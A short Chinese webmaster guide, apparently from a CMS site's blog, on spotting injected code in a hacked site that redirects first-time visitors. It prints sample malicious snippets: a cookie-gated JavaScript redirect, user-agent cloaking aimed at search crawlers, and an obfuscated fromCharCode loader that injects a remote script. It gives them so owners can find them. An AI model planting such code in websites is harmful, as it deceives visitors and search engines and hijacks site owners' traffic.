假如你的网站被黑了,第一次打开网页时显示跳转到其他网站。再打开时却正常。
不要以为网站没事。请注意查一下类似于以下的代码。
var c = document.cookie;
if (c.indexOf('isfirstvisited=false') != -1) {
}
else {
var d = new Date();
d.setFullYear(d.getFullYear() + 1);
document.cookie = 'isfirstvisited=false;expires=' + d.toGMTString();
location = 'https://baidu.com'
}这是以JS为例子,如果被植入的木马在PHP中,大致雷同。
请务必进行全站搜索相关关键词
isfirstvisited
等
同时看一下后台数据库中有没有被修改或者模板文件中被修改类似这样的。
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf('baidu') == -1)另一种:
<script>
if (!navigator.userAgent.match(/baiduspider|sogou|360spider|yisou/i)) {
document.title = "正常的标题";
}
</script>根据访问者是否为特定爬虫来决定是否动态设置页面标题。这就是为了迷惑网站管理人员的,当你直接打开网页的时候,显示正常的标题,当你通过搜索引擎打开就显示他附加的另外的代码设置的标题,然后进行跳转,通常伴有内似下面的代码。
<noscript><title>字符#什么的</title>
<meta name="keywords" content="字符#什么的"/>
<meta name="description" content="字符#什么的"/></noscript>
<script type="text/javascript">;var bc = String.fromCharCode(104,106,115等一串数字实际上是生成一个动态JS); var script = document.createElement('script'); script.src = bc; document.head.appendChild(script);</script>
我们的网站后台默认有一个留言的提醒数据:但是如果要有多个留言表单,那么我们自定义的留言表单却没有这个...
在之前的文章中,我们有讲过,如何使用扩展字段来此入HTML代码并添加预览功能。文章链接可查看:https://ww...
以下内容来源于PB交流QQ群。第一:NGINX配置。#拦截常见敏感后台路径访问(例如dede、admin、wp-login等),...
在外贸网站建设中,我们会遇到有客户说需要用户前端留言的时候可以上传自定义的文件或者图片等资料。那么这...
